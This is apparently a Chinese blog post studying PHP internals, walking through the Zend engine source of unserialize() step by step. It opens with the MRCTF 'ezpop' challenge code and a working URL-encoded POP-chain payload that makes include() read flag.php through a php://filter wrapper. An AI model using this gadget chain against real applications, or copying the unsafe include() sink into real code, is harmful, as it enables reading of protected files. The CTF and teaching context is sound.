php内核学习三

一、前沿

本次主要是从内核层看php反序列化的整个过程,下面贴代码(来自MRctf的ezpop)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}

class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}

public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}

class Test{
public $p;
public function __construct(){
$this->p = array();
}

public function __get($key){
$function = $this->p;
return $function();
}
}
$c='O%3A4%3A%22show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A3%3A%22aaa%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A3%3A%22var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D';
$a=urldecode($c);
if(isset($a)){
@unserialize($a);
}
else{
$a=new Show;
highlight_file(__FILE__);
}

二、具体函数及功能

前面到函数的执行 过程就不一一缀述了下面直接从unserialize函数开始

var.c PHP_FUNCTION(unserialize)

在此函数中先进行初始化进入

PHP_VAR_UNSERIALIZE_INIT(var_hash)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
if (BG(serialize_lock) || !BG(unserialize).level) {
d = emalloc(sizeof(struct php_unserialize_data));
d->last = &d->entries;
d->first_dtor = d->last_dtor = NULL;
d->allowed_classes = NULL;
d->ref_props = NULL;
d->cur_depth = 0;
d->max_depth = BG(unserialize_max_depth);
d->entries.used_slots = 0;
d->entries.next = NULL;
if (!BG(serialize_lock)) {
BG(unserialize).data = d;
BG(unserialize).level = 1;
}
} else {
d = BG(unserialize).data;
++BG(unserialize).level;
}

此处建立一个名为php_unserialize_data_t结构体,其中保存着和反序列化相关的信息。

在初始化反序列化后,进入

var_unserialize.re php_var_unserialize(retval, &p, p + buf_len, &var_hash)

1
2
3
4
5
6
7
PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER)
{
var_entries *orig_var_entries = (*var_hash)->last;
zend_long orig_used_slots = orig_var_entries ? orig_var_entries->used_slots : 0;
int result;

result = php_var_unserialize_internal(UNSERIALIZE_PASSTHRU, 0);

此处进入反序列化处理的关键函数

var_unserialize.re php_var_unserialize_internal()

先进行词法解析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
if (yych <= 'a') {
if (yych <= 'O') {
if (yych <= 'C') {
if (yych >= 'C') goto yy4;
} else {
if (yych <= 'M') goto yy2;
if (yych <= 'N') goto yy5;
goto yy4;
}
} else {
if (yych <= 'R') {
if (yych >= 'R') goto yy6;
} else {
if (yych <= 'S') goto yy7;
if (yych >= 'a') goto yy8;
}
}
} else {
if (yych <= 'i') {
if (yych <= 'c') {
if (yych <= 'b') goto yy9;
} else {
if (yych <= 'd') goto yy10;
if (yych >= 'i') goto yy11;
}
} else {
if (yych <= 's') {
if (yych <= 'q') goto yy2;
if (yych <= 'r') goto yy12;
goto yy13;
} else {
if (yych == '}') goto yy14;
}
}
}

这是所有的类型名,解析出开头的字符O,然后进入object的解析流程,在object解析流程中有,会有取类名长度的操作:

1
2
3
4
5
6
7
8
9
while (1) {//通过while循环来取数字
cursor = *p;
if (cursor >= '0' && cursor <= '9') {
result = result * 10 + (size_t)(cursor - (unsigned char)'0');
} else {
break;
}
p++;
}

取完类名长度后后执行初始化类名变量的操作class_name = zend_string_init(str, len, 0);

之后再判断反序列化的类是不是被允许的类(这是php7的一个新特性,可以控制允许进行反序列化操作的类)

1
2
3
4
5
if(!unserialize_allowed_class(class_name, var_hash)) {
incomplete_class = 1;
ce = PHP_IC_ENTRY;
break;
}

之后开始根据传人的类名寻找类ce = zend_lookup_class(class_name);

zend_execute_api.c zend_lookup_class_ex()

这个函数主要是查找类的zend_class_entry过程

其中有段代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
if (key) {
lc_name = key;
} else {
if (name == NULL || !ZSTR_LEN(name)) {
return NULL;
}

if (ZSTR_VAL(name)[0] == '\\') {
lc_name = zend_string_alloc(ZSTR_LEN(name) - 1, 0);
zend_str_tolower_copy(ZSTR_VAL(lc_name), ZSTR_VAL(name) + 1, ZSTR_LEN(name) - 1);
} else {
lc_name = zend_string_tolower(name);//这里会将序列化中的大写转小写
}
}
zv = zend_hash_find(EG(class_table), lc_name);

这段代码中的tolower将我们传入的大写的序列化字符串的类名转成小写。然后在EG中寻找类。

所有PHP脚本中定义的类以及内核、扩展中定义的内部类通过一个以”类名”作为索引的哈希表存储,这个哈希表保存在Zend引擎global变量中:zend_executor_globals.class_table(即:EG(class_table))

找到类后,将类的信息给到ce变量,然后继续解析类中属性的个数,解析完成以后查看是否有__unserialize(),查找方法和之前类名的查找一样,先将类名转成hash,然后再在EG表中查找。

1
2
has_unserialize = !incomplete_class
&& zend_hash_str_exists(&ce->function_table, "__unserialize", sizeof("__unserialize")-1);

紧接着再初始化对象object_init_ex(rval, ce),初始化完成后进入

object_common(UNSERIALIZE_PASSTHRU, elements, has_unserialize)

在这个函数中会查看是否有__wakeup函数

1
2
has_wakeup = Z_OBJCE_P(rval) != PHP_IC_ENTRY
&& zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup", sizeof("__wakeup")-1);

之后进入Z_OBJPROP_P(rval),这个函数中有个关键函数rebuild_object_properties(zobj)

zend_object_handlers.c rebuild_object_properties()

1
2
3
4
5
6
7
8
9
10
11
12
ZEND_HASH_FOREACH_PTR(&ce->properties_info, prop_info) {
if (!(prop_info->flags & ZEND_ACC_STATIC)) {
flags |= prop_info->flags;

if (UNEXPECTED(Z_TYPE_P(OBJ_PROP(zobj, prop_info->offset)) == IS_UNDEF)) {
HT_FLAGS(zobj->properties) |= HASH_FLAG_HAS_EMPTY_IND;
}

_zend_hash_append_ind(zobj->properties, prop_info->name,
OBJ_PROP(zobj, prop_info->offset));
}
} ZEND_HASH_FOREACH_END();

通过一个foreach语句将source和str属性名传入ce(保存类的结构体)

现在又回到object_comment()函数中

其中有个很重要的函数process_nested_data(UNSERIALIZE_PASSTHRU, ht, elements, Z_OBJ_P(rval))

var_unserialize.re process_nested_data()

1
2
3
4
5
6
7
8
9
10
11
while (elements-- > 0) {
zval key, *data, d, *old_data;
zend_ulong idx;
zend_property_info *info = NULL;

ZVAL_UNDEF(&key);

if (!php_var_unserialize_internal(&key, p, max, NULL, 1)) {
zval_ptr_dtor(&key);
goto failure;
}

这个函数继续调用php_var_unserialize_internal()进行取值操作,然后就是之前的解析类型名,解析长度,解析完成后返回此函数,进行下一步,属性名解析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
if ((unmangled_class == NULL || !strcmp(unmangled_class, "*") || !strcasecmp(unmangled_class, ZSTR_VAL(obj->ce->name)))
&& (existing_propinfo != NULL)
&& (existing_propinfo->flags & ZEND_ACC_PPP_MASK)) {
if (existing_propinfo->flags & ZEND_ACC_PROTECTED) {
new_key = zend_mangle_property_name(
"*", 1, ZSTR_VAL(unmangled), ZSTR_LEN(unmangled), 0);
zend_string_release_ex(unmangled, 0);
} else if (existing_propinfo->flags & ZEND_ACC_PRIVATE) {
if (unmangled_class != NULL && strcmp(unmangled_class, "*") != 0) {
new_key = zend_mangle_property_name(
unmangled_class, strlen(unmangled_class),
ZSTR_VAL(unmangled), ZSTR_LEN(unmangled),
0);
} else {
new_key = zend_mangle_property_name(
ZSTR_VAL(existing_propinfo->ce->name), ZSTR_LEN(existing_propinfo->ce->name),
ZSTR_VAL(unmangled), ZSTR_LEN(unmangled),
0);
}
zend_string_release_ex(unmangled, 0);
} else {
ZEND_ASSERT(existing_propinfo->flags & ZEND_ACC_PUBLIC);
new_key = unmangled;
}

此处进行解析属性的类型,例如是private还是protected或者public,解析完成后继续进入php_var_unserialize_internal()进行解析属性值,然后将属性值传入生成的对象中